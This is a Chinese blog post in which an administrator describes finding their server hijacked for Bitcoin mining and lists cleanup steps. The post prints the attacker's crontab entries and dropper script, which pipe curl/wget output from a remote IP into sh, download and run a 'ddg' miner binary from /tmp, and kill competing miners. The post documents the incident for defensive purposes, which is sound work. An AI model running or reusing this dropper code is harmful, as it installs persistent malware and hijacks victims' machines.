服务器被入侵——比特币挖矿分享

最近公司的一个服务器cpu占用比较高,定时任务出现问题,后来发现竟然给入侵了,用来跑比特币挖矿,特意分享下挖矿脚本

平时写点脚本定时任务备份数据库,最近登上服务器,才发现crontab被串改了。我写的定时脚本给删了。。。

就奇怪了,无端端多了几个计划任务

crontab -l 查看多了几个定时任务:
[[email protected] ~]# crontab -l
*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

开始还以为公司那位干的定时任务,我就研究下干什么,查了一下发现是印度IP,发现服务器入侵了

*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh
*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh

后来查询一下竟然发现是挖矿脚本,知道了事情的严重性,查看脚本跑的事件

curl -fsSL http://218.248.40.228:8443/i.sh 查看挖矿脚本:

[[email protected] ~]# curl -fsSL http://218.248.40.228:8443/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.2020" ]; then
    curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020
fi

if [ ! -f "/tmp/ddg.2020" ]; then
    wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020
fi

chmod +x /tmp/ddg.2020 && /tmp/ddg.2020

ps auxf | grep -v grep | grep Circle_MI | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk ‘{print $2}‘ | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk ‘{print $2}‘ | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk ‘{print $2}‘ | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk ‘{print $2}‘ | kill

的确发现 有 入侵文件

问题比较严重,最后解决办法

  1. 、停掉计划任务:

  2、查看暴力破解的记录,发现并没有异常,并删除掉

  3、查看异常进程,kill异常进程

  4、文件处理,删除异常文件

  5、修改登录密码

  6、防火墙安全性提高

  7、入侵警报等等

时间: 2024-10-05 18:40:01

服务器被入侵——比特币挖矿分享的相关文章

对比特币挖矿木马分析研究和清除

本文作者:simeon 来源:i春秋社区 一.什么是比特币系统 有关比特币的专业知识讲解的内容资料很多,我这里只是简单通俗的记录下个人的学习和对他的理解.大家往往看到比特币首先想问的它到底是什么,是不是钱.可以肯定的回答大家,他是钱,但是他不只是个体,他其实是一个虚拟的电子货币支付系统,是的是一个系统. 所以我这里说了这么多的废话,就是希望大家以后看到比特币,我们不是把它看成是一个硬币,而是我们一看到比特币,我就立马想到的是它其实是一个系统(电子币虚拟支付系统).只要大家能这样想,后面讲的内容大

服务器被入侵了怎么办?

遇到服务器被黑,很多人会采用拔网线.封 iptables 或者关掉所有服务的方式应急,但如果是线上服务器就不能立即采用任何影响业务的手段了,需要根据服务器业务情况分类处理. 下面我们看一个标准的服务器安全应急影响应该怎么做,也算是笔者从事安全事件应急近 6 年以来的一些经验之谈,借此抛砖引玉,希望大神们不吝赐教. 图 1:处理思路 如上图,将服务器安全应急响应流程分为如下 8 个环节: 发现安全事件(核实) 现场保护 服务器保护 影响范围评估 在线分析 数据备份 深入分析 事件报告整理 接下来我

《区块链100问》第27集:比特币挖矿机进化史

自从比特币诞生以来,比特币挖矿经历了以下四个阶段: CPU挖矿-GPU挖矿-专业矿机挖矿-矿池挖矿. 2009年1月3日,比特币创始人中本聪用电脑CPU挖出了第一批比特币. 随着大家对比特币的认可,挖矿的人越来越多,全网算力不断上升,挖矿难度逐渐上涨. 2010年9月18日第一个显卡挖矿软件发布.一张显卡相当于几十个CPU,挖矿能力得到明显提升. 之后又有人发明了基于挖矿芯片的专业挖矿设备,即矿机.目前行业领先的蚂蚁矿机装有将近200张BM1387芯片,相当于3万多张GPU的算力. 随着更多矿机

比特币挖矿对环境真正的影响是什么?

加密货币挖矿其实比印制法币耗费的电力少. 截至现在,比特币每天交易数量高达15万-40万笔.随着比特币网络算力难度的增加,挖矿对环境影响的问题也愈加突出.比特币挖矿制度简介 比特币挖矿制度指通过计算机硬件为比特币网络开展数学运算,这个过程中提供服务的矿工可以得到一笔报酬.由于发放token数量依据矿工完成的任务来计算,因此挖矿竞争十分激烈. 比特币挖矿始于CPU或者GPU这种低成本的硬件,不过随着比特币算力难度的增加,如今比特币挖矿活动主要依赖ASIC矿机.这些矿机需要大量的电力才能运行. 用电

linux的FTP服务器搭建及FTP服务器的入侵和防御

FTP 是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为"文传协议".用于Internet上的控制文件的双向传输. 与大多数Internet服务一样,FTP也是一个客户机/服务器系统.用户通过一个支持FTP协议的客户机程序,连接到在远程主机上的FTP服务器程序.用户通过客户机程序向服务器程序发出命令,服务器程序执行用户所发出的命令,并将执行的结果返回到客户机. 用户分类 Real帐户 这类用户是指在FTP服务上拥有帐号.当这类用户登录FTP服务器的

Linux服务器运维安全策略经验分享

http://jxtm.jzu.cn/?p=3692 大家好,我是南非蚂蚁,今天跟大家分享的主题是:线上Linux服务器运维安全策略经验.安全是IT行业一个老生常谈的话题了,从之前的“棱镜门”事件中折射出了很多安全问题,处理好信息安全问题已变得刻不容缓.因此做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞.今天,我为大家讲的,主要分五部分展开:账户和登录安全账户安全是系统安全的第一道屏障,也是系统安全的核心,保障登录

记一次Linux服务器被入侵后的检测过程

作者 | 哈兹本德     来源 | FreeBuf 0×00 前言 故事是这样的,大年初一,客户反应他们服务器无法访问,查看路由,发现某oracle+tomcat服务器UDP流量超大,把带宽占完了,过年嘛,客户那边先找了当地的技术人员弄了几天没搞定,然后没办法大年初三的找我们弄-顾客是上帝! 其实吧以前也遇到过这类攻击,当时某IDC都被打瘫了,只不过马儿不在我们的设备上,所以没过多关注- 0×01 查找木马 首先SSH登陆,top查看进程,发现奇怪名字的命令gejfhzthbp,一看就感觉有问

IOS开发教程之put上传文件的服务器的配置及实例分享-备用

感谢大神分享 1,HTTP常见的方法 GET 获取指定资源 POST 2M 向指定资源提交数据进行处理请求,在RESTful风格中用于新增资源 HEAD 获取指定资源头部信息PUT 替换指定资源(不支持浏览器操作)DELETE 删除指定资源 2,配置服务器的put请求方式: 复制代码代码如下: 1> n 打开终端p cd /etc/apache2p sudo vim httpd.conf n 在vim中输入p /httpd-dav.conf• 查找httpd-dav.confp 按0将光标移动至

怎样使用 Tripwire 来检测 Ubuntu VPS 服务器的入侵

介绍 当管理联网服务器时,服务器的安全是一个非常复杂的问题.尽管可以配置防火墙.设置日志策略.购买安全服务或者锁定应用,如果你想确保阻止每次入侵这远远不够. 一个 HIDS 可以收集你电脑的文件系统和配置,存储这些信息用来参考和判断系统当前的运行状态.如果在已知安全的状态和当前状态之间发生了改动,就表明可能已经并不安全了. Linux 下一个流行的 HIDS 是 Tripwire.这个软件可以跟踪许多不同的文件系统数据,以检测是否发生未经授权的更改. 在本文中,我们将讨论如何在 Ubuntu 1